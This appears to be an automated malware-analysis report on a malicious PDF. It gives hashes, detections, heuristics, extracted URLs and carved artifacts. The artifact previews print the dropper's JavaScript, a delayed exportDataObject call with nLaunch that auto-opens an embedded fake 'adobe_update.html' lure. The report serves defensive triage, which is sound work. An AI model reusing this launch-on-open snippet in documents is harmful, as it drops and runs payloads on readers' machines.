PDF malware analysis — malicious · be2991b9dc4e34bf

MALICIOUS

PDF

600.1 KB Authoring application: PyPDF2 First seen: 2026-06-05

MD5: 656b9147de9db6a7ed2651148c7e8ace SHA-1: 31481fbceda169970161e0f0f3dda83ac41a2d66 SHA-256: be2991b9dc4e34bf8f4e96fd20239132ecbcd998c446500537c78cbf1aa8661b

260 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The PDF contains JavaScript that uses `exportDataObject` to launch an embedded HTML file named 'adobe_update.html' upon opening. This HTML file is likely a lure to trick the user into downloading a malicious payload. The presence of ClamAV detections and ML classifiers further supports the malicious nature of this file.

Machine Learning

Nyx PDF Classifier malicious score 0.9793

Heuristics 9

ClamAV: Win.Packed.Generickdz-9879553-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Packed.Generickdz-9879553-0
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
exportDataObject + nLaunch — embedded-file launch-on-open dropper critical PDF_JS_EXPORT_LAUNCH_DROPPER

PDF JavaScript calls exportDataObject() with nLaunch set, which extracts the document's embedded file and launches it in its default application. This is a launch-on-open dropper: the embedded file is the payload. No benign workflow auto-launches an extracted PDF attachment.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded script payload in PDF stream medium PDF_EMBEDDED_SCRIPT_PAYLOAD

PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
Embedded file low PDF_EMBEDDED

PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
External URI info PDF_URI

PDF contains an external URL action
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js Referenced by PDF JavaScript
- http://aa.ogepscmaa/isjur/../qeymnjReferenced by PDF JavaScript
- https://get.adobe.com/uk/reader/Referenced by PDF JavaScript
- https://get.adobe.com/reader/modal/?content=readerSystemRequirement&loc=uk&version=2021%2E005%2E20058&os=Windows&fakeajaxPDF link annotation

Extracted artifacts 7

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`adobe_update.html`	pdf-embedded-file	PDF EmbeddedFile object 7 at offset 0x493	524851 bytes
SHA-256: `1b6e48bee49fc065a56abaff9c76b61251eddcd6782574c7aaa8cc1d2482d8bc`
Detection ClamAV: Win.Packed.Generickdz-9879553-0 Obfuscation or payload: likely 4946 of 10433 identifiers look randomly generated (e.g. 'dj56Pn48ZgGSAvIKwhECGCIcoioiTcJfUlyGDeYX'); 35 string-concatenation chain(s) — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
`javascript_obj0004_000.js`	pdf-javascript-stream	PDF /JS object 4 at offset 0x27D	106 bytes
SHA-256: `d692f7662d545726b3153195252dcc81ba2e30e33a95a9662637802a7e9e8712`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var t = app.setTimeOut("this.exportDataObject({ cName: 'adobe_update.html', nLaunch: 2 });",2000);
`javascript_obj0004_001.js`	pdf-javascript-stream	PDF /JS object 4 at offset 0x27D	92 bytes
SHA-256: `8daf2ab33e463fb46dbe0e000ffb0a9d7c0911b790cf1f20b31981e3f36b2207`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var t = app.setTimeOut("this.exportDataObject({ cName: 'adobe_update.html', nLaunch: 2 }
`combined_document_js_000.js`	deobfuscated-js	combined document JavaScript streams at offset 0x27D	199 bytes
SHA-256: `8b7f22b425408a6f5affcb45dda2e7a0c35b98f2e76a96af44b6e01130380220`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var t = app.setTimeOut("this.exportDataObject({ cName: 'adobe_update.html', nLaunch: 2 });",2000); var t = app.setTimeOut("this.exportDataObject({ cName: 'adobe_update.html', nLaunch: 2 }
`font_00_sfnt_off00082020.bin`	pdf-font-stream	PDF embedded font (sfnt) at offset 0x82020	49460 bytes
SHA-256: `b3d663073f10dc69ed2ade8e0ddeee3b7e20a30127907ae0d6db821003f3e4e9`
`font_01_sfnt_off00089b68.bin`	pdf-font-stream	PDF embedded font (sfnt) at offset 0x89B68	20776 bytes
SHA-256: `155af8f01291e607f59df6e62c2c08cb4989cd882a2df56db771222d91f14aa9`
`font_02_sfnt_off0008ce02.bin`	pdf-font-stream	PDF embedded font (sfnt) at offset 0x8CE02	38572 bytes
SHA-256: `9e4e3f12965c0d41143ab78585170c3f3cdad1b5b8f7bdd79d0c75611b1d695e`

Open this report in the interactive analyzer, or submit your own file for analysis.